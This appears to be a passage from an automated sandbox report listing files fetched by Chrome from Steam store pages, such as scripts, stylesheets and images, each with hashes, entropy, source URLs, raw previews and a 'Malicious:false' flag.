        Preview:......Exif..II*.................Ducky.......<......Adobe.d.................................................................................................................................................8........................................................................................!.1.A.".Q.a2.B#q..3Rb$........................!..1.AQ"..a2B#.............?..w:2...................................u...h....u.}@ ...0.......[..M)..p.....^.0.7P2@..<.H.>@........^@w.?.d.....@.p.w.....y.\..]:......`..%.&...>.....h...{.|.....O[4Q ]....k..Rg..y....p..jR'..<.\....AS..)..i#..Ps..7UF...d.6...SRb.O..mr.;.R:.......X_.._.sU\}..R..:cC....S...{x%..=.z..yG.[t.S.5.O._.=3.H..|:r.+..7%b.zt+Nc.\c...|.&.K..-.qz..\...O.+u...3.>./.....5...D...*......H.$.&ER@0..o..gW.u.8'N=...N.Y...g.x...PR................>......>.1...W...C\....a..2...%TA...=oWd...ur..Z......&_...*m..?.....O.....Fly.D.D6.r....OK&....H.b...Z...)A.........]Z.U.4VL.&YS../.0p......p......4.*....)....*B.a.3b.A8....V.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with CRLF line terminators
        Category:downloaded
        Size (bytes):90927
        Entropy (8bit):5.426662861316201
        Encrypted:false
        SSDEEP:1536:imsvf3ZcGj0CqW26gdE5a70sHe2TO1KnVn6z4E/YfhlOPBr90w6ssOZrQVSsmHN3:K016gmQ9n6z4E/BC2N4I
        MD5:213E2386520BCADE779407C55FA5023D
        SHA1:F5B1A976297DC5A866049DB080FC545F675CA9C9
        SHA-256:1737A02FB0EA0CC30133A44EEEB8AA7B97294DE30D36EB57C1C58ABC58B87F68
        SHA-512:DAA51BBBC4E01621C35A682DD62C0FE41961428CF986F67A9736085924D61AC8DD0A3A76A1C2625B5EB5F07F48E191075A202BED11705D83E146F7DD81387383
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/dynamicstore.js?v=IT4jhlILyt53&l=russian&_cdn=cloudflare
        Preview:..function GetElemSNR( $Elem )..{...var snr = $Elem.data( 'snr' );...if ( typeof snr != 'undefined' )...{....return snr;...}.....// look for links with snr parameter...var links = $Elem.is( 'a' ) ? $Elem : $Elem.find( 'a' );...snr = null;...for ( var i = 0; i < links.length; ++i )...{....var link = links[i];....var navinfo = link.href.match( /[\?&]snr=([a-zA-Z0-9\-\_ ]+)/ );....if ( navinfo )....{.....snr = navinfo[1];.....break;....}...}.....$Elem.data( 'snr', snr );...return snr;..}....// given an array of impressions as strings, this will handle joining them all together into a singular string, but enforcing that it doesn't..// go above the cookie size limit which can otherwise cause users to become stuck since the page requests will start failing..function JoinImpressionsUpToLimit( rgImpressions )..{...//cookies generally can go up to 4k bytes, but we can have problems when we start getting that close, so cut it off earlier...var nRemainingLen = 3200;...var result = '';...for ( var
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 744 x 171, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):10863
        Entropy (8bit):7.893336023408476
        Encrypted:false
        SSDEEP:192:5ARjfa23tAJsqmbZEyI3ImwTHVeVUzp7C+22Z6XikPFffq0BV0FIZLKePlOoYWn4:5AfaItAJsfElI3jVwUzpC+JqNfC0wFIM
        MD5:A4E79C73EE13CB25B60FC4B0BA1F690C
        SHA1:B690C31B2EB1B0EB085E91AAAE7E79F03DEBE7C1
        SHA-256:6CB869DF089146C12EFB5E9C968E911C314842624BA6F052A11346AC734CADC8
        SHA-512:AAD423119F410A655F0AA475D2FE692087D7262C3986CE71347981C5B60F6A10031D7050BF9B9AEE4E7D84D814F0B8883C964028FCBE14ED3464602F3BA6CEC3
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.............4.i{....sRGB.........gAMA......a.....pHYs..........o.d..).IDATx^...}U......|.hp(..%1..H.DQ..(..H..HF..H..(.B1...hP.B1.."1..")...(."..I.".x.....:.9.......>.c....~....>..c.....7O?..sDDDDD.....QDDDDD.......S...g.Nj..........h.EDDD.F........N;.B.r..!.%.phm.9.....\DDDdr4.25..].:/..?%4...a...}.H.........]..!..qm.....|m..]DDDdp4.24...$....R..>....{..y.""""..A.! .....C.s.....0......""""}.A.>...{Co.../,..K1._.Qt*"""r..t..r.?.z..l.`.?......tB...@^..Ctb...h...QuZ;....$.A.\..zW.cN.r..c!"._....""".....pY..C.$.'CD.?......N4..+B..1PH.CD....`DDDDZ..G.6...G.!........Bg......M4..r...".\....OB..../""".....&Dy...1..:.\.bJ......t9.....2..w"....&....H.....C..!...t0...Qu...Y(F..u._.4..C..v0.Z....."./.....:eu&%@..B....""".@LqY&.?RZ.^.I..(ty.....,....xA.^.....oCo..|u&""".G..,.......S.KC.b...Y../.".?.i...;....SDDDf..}.\."rNz...u...:.UDDd.h......)_?....z..LDDDf..}.."r.9....].......Ht..6D..I.3.#..l.EDDd.h.....9.2_..zG..........8;..|..9..wWg"""
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):154330
        Entropy (8bit):5.568747319299635
        Encrypted:false
        SSDEEP:3072:lUNsXDcis6WjqrUaErz/sRedgatn7/q56wa6f2:lNVs6VYaErzkcdgatn7/q56wa6f2
        MD5:CED9F5A7B7A50FF3BE6C0CC74ABD8CC3
        SHA1:7D6C1CD11EC469D3D76E5B6E850C2E5FAB80D18C
        SHA-256:3A75131C0F0B23D88CD5A621CD541335EC42D6CEE5EE3838E8712D7AB32E9B6C
        SHA-512:298E33F5D1057188AA1806D55F10C2455CB8FC709DB8D4DBED5181464438296CF0F673DFF6681018E480CEFF878F05AB0A72785ECB744EA071AEBFBB1860BE07
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/css/v6/game.css?v=ztn1p7elD_O-&l=russian&_cdn=cloudflare
        Preview:....body.v6 .game_area_purchase h2.package_group {...margin-bottom: 0px;..}.......application_top_info_message {...color: #fff;...background: #852929;...display: block;...padding: 5px;...text-align: center;..}...application_top_info_message a {...text-decoration: underline;..}.....game_icon {...position: relative;...float: left;...height: 32px;...width: 32px;.....margin-top: 4px;...margin-right: 6px;..}.....game_icon .game_icon_overlay {...position: absolute;...left: 0px;...top: 0px;...width: 32px;...height: 32px;...background: url( /public/images/v5/game_ico_overlay.png );...background-repeat: no-repeat;..}.....game_name {...position: relative;...font-size: 26px;...color: white;.....font-family: "Motiva Sans", Sans-serif;....font-weight: normal; /* normal */.......margin-bottom: 16px;...overflow: hidden;..}.....game_name .blockbg {...height: 40px;...line-height: 40px;..}.....game_name img {...vertical-align: text-bottom;...height: 32px;...width: 32px;..}.....game_name .blockbg.dlc_tit
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (1667), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):19092
        Entropy (8bit):5.511106072147819
        Encrypted:false
        SSDEEP:384:fwtVMAjYb2JalUNlpczHK7DYiHiEiN/mDP+pPIOw6GNNZhweP8/F:fmS6FJJNzczHK7DFHix/mP+pPIOwlNzi
        MD5:7BE183DFBCFB68E7BBB8084AE6286674
        SHA1:CD11E711622EE7705B9258027C4F065FD55F9E00
        SHA-256:14A9F76C1AE6A675422A20FB69BB89FBCB42ED68915FB86CD0A16DCD5D185E57
        SHA-512:023EA3EF7D646843D31F6BB10E6E6F5B1C4EB59E9FD0D11FCAB0D59606BAB2D78ED68CDDAC5722F0023D5E36BD65FD6B77EACBC41713F5F89257223E398C5596
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=e-GD37z7aOe7&l=english
        Preview:...responsive_page_frame {...position: relative;..}....body.movescrolltocontent .responsive_page_frame {...position: fixed;...top: 0;...right: 0;...bottom: 0;...left: 0;...overflow: auto;..}....body.overflow_hidden,..body.overflow_hidden .responsive_page_frame {...overflow: hidden;...position: relative;..}....html.responsive {...height: 100%;..}....html.responsive body {...min-height: 100%;...height: auto;...position: relative;..}....html.responsive body.movescrolltocontent {...position: fixed;...top: 0;...right: 0;...bottom: 0;...left: 0;..}.....responsive_page_content {..}.....partner_events .responsive_page_content {.. height: 100vh;..}.....responsive_page_menu_ctn {...display: none;...position: fixed;...top: 0;...bottom: 0;...overflow: hidden;.....background: black;.....z-index: 30;...width: 280px;..}.....responsive_page_frame:not(.in_menu_drag) .responsive_page_menu_ctn {...transition: left 0.5s, right 0.5s;..}.....responsive_page_menu_ctn.mainmenu {...left: -280px;..}.....resp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65482), with CRLF line terminators
        Category:downloaded
        Size (bytes):93637
        Entropy (8bit):5.292996107428883
        Encrypted:false
        SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
        MD5:E1288116312E4728F98923C79B034B67
        SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
        SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
        SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU
        Preview:/*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):6568
        Entropy (8bit):7.926040560239071
        Encrypted:false
        SSDEEP:192:gRsNKDDuOI3B+AhEbVJoklDHW9B0zGJB3uzV:ssSViC9HWz008zV
        MD5:E109F7B419A6DB3148F635B9042AE1C8
        SHA1:0C1A9E47DB424E1F5ED70AA2FE7E25D6B865BDBE
        SHA-256:E52BD14D28698E0586930AAB172E8B99B268A14E8FEFD339DD013F0BDB2BC1C0
        SHA-512:8CE5B3235B726A266E87EC15BF3A37982A6F6740548ACCD4ACF0E117C36C6CA0A6B5C4C7014FDEEC20C06BFD4EA98FD094F9C10E0F9EC1C37B71CF6731BB3297
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@...........................!1A.."Q.aq#2....Bb...3CR....G.......................................>........................!1.AQaq.."..2B.....T...#RSr...&3d...............?...V.I<..\._..(....TI$...8...w{.;.....[.bx....Zt...3.R.......'isa.R...!\p.clc..F.h...,L....Z2..........e....Na..... $.Gae'.E..,..g.u9........F....>...Z..p.....x.EZ.......QN...I.m..q8.b....@.R.m......n......V`N\..:...\`{.B?..K..7.L..P.;...V.V..3..bw...a.:..I2..s"=T...DXl.!o9.Q*...I......i3ky>..q...J..SQ.J...}......#...uB.U....?.K..G...,P......I...k.r..~..6v<.t....#..t.}...bL....;.?52.zp1.+......`B.c....y....p1+E......%.\.H.<R..HJv...D.g....0!..B.c.vB.DRs....O8..Is.h.lU.\.D..E..V./3.v4.n.1&..kL.i..,e..%.%.. .cp...+.o..b.?&LXD....MlG.;....l.&.......[...p.#z.....32.7N.....*.m{cF....9.V...u.ma
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 240 x 233, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):107109
        Entropy (8bit):7.991273750205561
        Encrypted:true
        SSDEEP:1536:rqX7o3K7FubRkzCd3O6CwnwJdtc2x6hz6uneru3VwPter+Op5KB7:Ql7glk9MuL9Y6ue4EternKB7
        MD5:91D19EA57891221CB46E02268C066703
        SHA1:215DD905195F8C4AF0DC72F786FE47CB7934627E
        SHA-256:16C72DA8260E0EADB95F0B00766112EA40EFDC2A9BF0B1AB8B9C49EDF6B270BF
        SHA-512:86298B3970CA5B68E6D8B1736A045837B8F991ACA5B196AC08CBA3C651092F87F4F999E57C5504ECA111028AA05533E389778C774B86162660D8C3B2AC4BFD76
        Malicious:false
        Reputation:low
        URL:https://store.steampowered.com/categories/homepageimage/category/rpg?cc=us&l=english
        Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............caNv...............<'A......IDATx.|.w.l.U..fXkU....9.[.jI...,.2I...d|...`s1|ncc06..E.6A.... ..$.R...9.>9.\q...?.ZU......sv.]a.....x..y..C9.`...G....)%2I..>.[..Y.<...\z..T.I...-....L<.JP:#i%.Z.4.!..x@..x..x.B......Sd.(.....LA...b4......l..g.p....R........JJ.!I%6..F..-...g.T..R..........i.KQTTe.j....S..s.._}..|...9t....y.eZ*.^......>.8..c0Q..,......G..e..6:KX...r..8|.q.~r..g.;..X.u.....u.g.R)...c.ww..w.lE@ ....&.I"...$I.'...K..)$.:&.]V..o.s..e....!.O.........h..p..p....s..O.%..;v=?..~..oy..x...........2*I.Z pT..{...,.LK......uo....g9z.5.<..]~.....?.c.R.L+.T....b....J.*..:....p.B...{.N4K.}........!....D.....4JJ..X..>..@.I}h.>. H......!.. .\.J.. ..?.a.;.....?......A..P?.]o./.R.H...7. $H.R.D).^E.#...Gk...'...R...zt.....-=..e.[..(.H...!C@.....p.I.@H..Q_...u...US>../..3..r\.z....k.K.....(\.&K.....H......4%.R...v.V...$7..8g:..l....S6.v...)F9w..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1328
        Entropy (8bit):6.880420597007017
        Encrypted:false
        SSDEEP:24:Gy1he91Wwjx82lY2T3ouVu5iyJ3VoijGTiesAaQW4EE9MFeEP:GwqQNn2xUJ3X9xP
        MD5:A05473892F605253A637C9E21842C6EA
        SHA1:29A2C7E5280141017572A51C3A453F09C196A170
        SHA-256:8721F5B77F1F3385DA250A584907545283BC2C474CDF0281C3EC7D48D28BCD21
        SHA-512:F5CA853AC7C196F1CF843C30CD5392A9A532B9A285486ED79FB1A4763BACA7AA6B1826E386CB9DAD0F5A29958A9E8144E32E07A8793EE6FA5A4B6DF8E1B9CC79
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images//v6/social/twitter_32_white.png
        Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:4EF25EF3C36011E7BE0ABFBDCAC69B75" xmpMM:DocumentID="xmp.did:4EF25EF4C36011E7BE0ABFBDCAC69B75"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4EF25EF1C36011E7BE0ABFBDCAC69B75" stRef:documentID="xmp.did:4EF25EF2C36011E7BE0ABFBDCAC69B75"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%^......IDATx..=K.@..7.....X.... X\!..Y\.. .U..A;....h!Z....6.a#..`c......(.Y..$....8.....L&B`........f{..2.....C..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):49766
        Entropy (8bit):7.983233054891611
        Encrypted:false
        SSDEEP:768:3GfwAtdzB4G52hSHzVKDs+ndVIUc1W2cCSPH7kLSQLowr3JtBBaEbdn7R:QzB4G5gSHcDxIb15cCKH7Rvwr3J44dnd
        MD5:E1F4757EF8272E743BBA55FF11290942
        SHA1:16847B75A0A23E5FF8B008D9A37DE2B6264631BE
        SHA-256:E850B2989DAAF381D713A962756B47BE320F7CDF7644F2C03003B83AF02D88C4
        SHA-512:F795640C2BE8FA8A92BC084D7B4A00A004414177D3AEAC81A7759B191699FD5D502AB3D3DBE45DCAD5FD38C71074F8303107197745886ACA599C06B070B16F8C
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C......................................................................................................................S..........................!1A..Qa."q.2....#BR..3..$br....7C...Su.%&48D......FVt....................................I.......................!.1.AQ.."aq2..........#Br.......35RT.4bs.6S$D...............?..C\...Z.....r.K...Z..B./.m..L..#R.n{\.O......$.&e...6./.8.....$.;....v.g..n.a.5B.mk.=q]...FwHj.......V..*.../K......U1.+^..'JV........jzt.1.T2..x...@.. .;E..50.......Ka.....f.T...;...~.S..O4.8....D.....nnN+=..1...._.......p.......>.yJ_US.\...?..0..%.+m[......`Z.....7...G...`.0.hK1.A.....t.#.np1(.1J.%..8..fV.,/.D.F............Q..1\.B...Glr5..^....M....ei..d...Y..,HM.5..X.A./.`..{..v..J..^...@I...O.-b.T.O..Q......;n.....Q..v.L...../#Z.._..H.9y{....w.l.*c..!..6s.../.S....f.s..G..).s..5...L...3......J...)U..{...........)..%l....c....t.mM"....bv..-a.A..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1850x450, components 3
        Category:downloaded
        Size (bytes):187730
        Entropy (8bit):7.953543760778215
        Encrypted:false
        SSDEEP:3072:+jN32VfU/ryvafr2GGTPssK5bOq9KHDaGuSB/AEaT0M4FhQKchiCKF/J:M5/ryWcTSz9CaGrIV091CKpJ
        MD5:C970CE7B066EA4F8C75EF8F178290AB4
        SHA1:A870C378D10C2EC7A2033A667F8C53C7E8CEAC49
        SHA-256:98665A8CCE01826E48B86614CCAC960C57134F0F285A50F6B8A9823C0292A8A0
        SHA-512:6C86E0A951CBEE8F8B1A1E6EE2347C60D3F56B1ABBA4CB9AFDA97BC50BECE69A7DF592368FD6704297EA524250BB1BBD0E93BC1519D01FCA33D0DA3B20BF4B38
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/frontpage/eb193c51e2c473096f72216e/page_bg_english.jpg?t=1716506545
        Preview:......Exif..II*.................Ducky.......<.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condit
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):32023
        Entropy (8bit):7.9662781277757695
        Encrypted:false
        SSDEEP:768:l+k8EjzDncUFLnjqwDGIy8pdKqbheBshtEagMnFOZaWu:ltRDcQruEjy8/kyEnMAal
        MD5:7747FFFD6A7828762A06BDF2780621F4
        SHA1:409E46993FF729B518026D49D5311BF7A8DC7ED7
        SHA-256:160AAF40EDDB413B83B1DA78C846B4D66B5123EEE1D7E43E287BCFA0BF3584D9
        SHA-512:83FCE1BB72E5A745BEA5666617EF2B952D362CA19A2E54F8178AF5553223E312CFAC181D97467B4A9249E83A928C83264089AF22D3F52505E2989F05CE9F9EAE
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/489830/header.jpg?t=1701807334
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................................................................N..........................!.1."AQ.aq.2....#B....R...3b..%..$4CSr...'s..).................................$.....................!1.A.Q"aq2BR.............?.......<......1.p..~..[.~...y.-..V.oC.8........!.....o....a.....V._........n..`.{X.{.........G.k....y.X....{...0R..k....$.`.7..k{.......bF.q{......!..}.....`.)....{...%Sae...}pC..._.o_l..,.....\.,v.y<.S.`./"...q.\...p..B..R... .....*....i.T..z.....'.b..!{q..?.....m.......%.H~I.7.o....tvk.....` v .pOs..c&.tS..SG....F..L..5..@..h..F}.I......-3...&...*Y..z...UI..f..:y...#.?.{[..&....n0.mA....{{c.v).._.:...I.....w.E./.d...gBd 6...2..._...v..[cX...q.s(...TSx.u=.=...:D.>..`...rF..,.........]+......#,.....k.H...kK8....&)...X.V3....4.9OTu..b\.S.G.r...a.o5.v...Q.$.....'.jL.e....y.......I.Su?58.f....^#E..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):34225
        Entropy (8bit):7.981752682161347
        Encrypted:false
        SSDEEP:768:nfCwCACoY4V0bhEQr9sZytmHUJ96VF8J7b6hy+Ne2tc7cB:fcbEQr9XE5VFAqz3c7K
        MD5:C28BAE522C9D35F1FCF0674DE41FFD26
        SHA1:ACD56DDF9857945CB2051A35842C26BD9F33F342
        SHA-256:4B53E5D28D1258C28BA8297B85ACB55C1E1EA32E89D162A1A3E830C0564D128C
        SHA-512:3BD00489834A2E39D01CA1857C3A87202A54E75384DEBEC7BCAFC71FFDE2AFFF4209BEFDDB6FD3BE87DBCE64A7BCC7435CBBC665F8DD72E4C4FF00DE63A13927
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................................................................b............................!1.."2A..#QaqBRbr......$3Ss...%Cc..&4DTt.....5....'6e....7EFUWu.....................................>........................"2.B...R.#34q.!$1Qab.ASr....5...%CD.............?..M.v............K..YN.......@.G.-.._.P& q^^r...9H.. 6...h.O....G.?..[..6T.:F/...t.`.@....m~...U.o..3U.i.......~w...5.......l..H... l.@......676n.|t.q....x.2.2..V..T.=.|..PSe..`r.:.P..?/.>....v2,.Y........H.....Iz....)..-....r.........5-<....d..r.i.t..0.%....^q.....9\..h}..&e..|}...N....a......?.C.P...9.wG....p5...%.......n.0*......Dg.f.06...........S.+..p.1.x\....uv....M......<^...Q..h..4Z...>..(&(,;=.b.yL..\a.A..@..,. ..,.m..Q.;.\@....@v6A.V.s.d.......a{\...L.R.$!zDf..S.D......."e.........O.P..n.80\..J.O..*.Qlkk...'15.l.[.\.uqD....)R..PL...IA...j
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:dropped
        Size (bytes):517
        Entropy (8bit):4.513978417181636
        Encrypted:false
        SSDEEP:12:trw90ruJlrlDyoEcd7AWVbgthDdYHptmekRHF4TndtiHp:tC0ruJlluoEsEWVgtoO2ndtY
        MD5:C9DD22AF273DE76CE331C16CA162C3CB
        SHA1:1654CC37A3E647C7A4274FAE22A987CE55852D3B
        SHA-256:80DD1F0A38053D83CCB30EF39E0A34DB0C22C47F097D48857DE8321DF50F63B2
        SHA-512:0E4AE92807DF74DCC7B8EB037937528DFF0A4735E37F575DFEFB96A59C89E3AB993016460DC725421291B8167393317A24912857409EE5FE33B3918CC2583B03
        Malicious:false
        Reputation:low
        Preview:<svg width="8" height="13" viewBox="0 0 8 13" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M1.58121 12.7508C1.409 12.9121 1.18982 13 0.931507 13C0.414873 13 0 12.6189 0 12.1353C0 11.8935 0.10959 11.6736 0.289629 11.5051L5.76908 6.49267L0.289629 1.49493C0.10959 1.32638 0 1.09921 0 0.864713C0 0.38106 0.414873 0 0.931507 0C1.18982 0 1.409 0.0879369 1.58121 0.249154L7.67123 5.81849C7.89041 6.00902 7.99217 6.24352 8 6.5C8 6.75648 7.89041 6.97632 7.67123 7.17418L1.58121 12.7508Z" fill="white" />..</svg>..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):9548
        Entropy (8bit):7.957598163788815
        Encrypted:false
        SSDEEP:192:DW5rC2uaaS7/2YIrRhOp5Xq4In3lNc+dnJslFGb5+R:i5e2taS2YsRhUXq4It2lb
        MD5:37BF242FD3DB3C9225149A3B79FA9E0D
        SHA1:99947B23BB9DF12A8596926112C4C91278923AF3
        SHA-256:0CC0AF62CEE59FE2CAEE93B9919345FA2FF47EF0719AC04F2368B79CC5DA8A01
        SHA-512:4D599ABD5E16092E2C4545177F4E4FB4F4C31262C78EEA7E85E9A44541E82A7E0B2EAD44B76FF41897D583B8F4086F1466496B955CE438A960AC667B83A76A46
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2186680/capsule_184x69.jpg?t=1716547508
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................M...........................!.1.."AQa.2q.....#$3..5R.....'tu.BCDEbdr........................................=........................!1.AQ..aq....."R.......24B..#.$b.r.............?..ugV.Y...d..0K,.*r+kH.$.....8........=/....{.a..ScvV....5.[.{.N.\f.....CzL)...P..!.).).X%.q.....;g.Z..}...o.u...:.o.....G.m...#...:...&+./jRV..)..)H.....}..X.....[.c..4...k.2...>8.%70y<..0.hy!..4.P...V.U...(r8.T.s.<\....D..n.$...:..^......*....l.W..fdw...)F.....q.<.k3eR.q...GrB..S...W...P.8...(.........Hx....iQ......nt...]8....,.....G..;.y.E..3..T|mg&nY.N#.J9....lj2m.o.rN....3.......K...6$B`[..N..}=..O.t6..3....7%V...-~a1.8.#.....H|..{..A..OL..V.V...k.......zN...9'E..3...........o#....p.G..>....Oc<..~;....M....p>H......$....g..c..xu...=_d...p.J..{Gr.5h...x..x..G.........J...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 118x118, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):4522
        Entropy (8bit):7.894880048690622
        Encrypted:false
        SSDEEP:96:rPToi6+S6X6lVhH5tenJWEotqSGecuePYIRun6DlvA/nRVEXhdn:jTosSnlHZtenJ/otqSGaGu6ZApVyj
        MD5:2E6FCFE977F83AA4B97AF8B979602AEB
        SHA1:0E5427CF9F3F084B7F2920F4361A0D2E937F1349
        SHA-256:75660BBCAF03CAF3DB55DD34A246D19A10A8D21E8C0F8BDE94B2CE8C81796A98
        SHA-512:46E7C492C6B6F1A9CC8171F09118335EDB5C1BF6D8C9A0D8E4102545CB726ADD67D4C4D5757992B1C553FEE6186B3B5C912F8304BB490D9500E7851C02FAC9C7
        Malicious:false
        Reputation:low
        Preview:......JFIF.....v.v.....C....................................................................C.......................................................................E..............................................A.........................!...1AQ."aq.2.R...#$B.....3FScdr.....................................&......................!.1AQ.".#aq3B.............?..N>...E.I...B...z.z....%=G.f..M.Zw-..f.%...S.O].....X.`._~pr4...h.ygJ2@I..X.....n.....m...d..QQB..3.%U....aK..{l.....{r...s.Li..u.8...>...#....Em......}4*.uF3.tN..>.7.....\.Z.fy.C.4...i]...*JS...e!...Z".d..X).=.t...b.E..........]b..!.......)..]gU...'...;.bw.......P.n...#G.....>f.EL...7%...)..j..##.........'..V..t.-..N*6..G.....#....+%4..R......k&;....9t.....Uxq.....ak6.K.q.5.....0.'.;...S.v1.\k$...!55h.t...u..=.Oz..Osy...2.....,.U.W.q..K^.ZI.zW..Y.#l-.}.tS...t-Ac.....EN..`..(..L..W...M..1.l.,.o.t.'+%...i.g55..I,.+.%.>.<..:.50...}....a.FNp..i.$..AM7p..uX.D'%D....y..F.$`..x..".8...,.c.S*'.2ut..\EQ.d.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3832
        Entropy (8bit):7.879119679233873
        Encrypted:false
        SSDEEP:96:vnLtTez+0jB6dHa0M6tse0BG9gtma8X6cf026uqKpY:fpTe/p6rWG9gtmodk2
        MD5:35E0FA2D052DCD95A8C069E24053105A
        SHA1:238C422C5E5F17066B129BBFD5DCA07A0B669C21
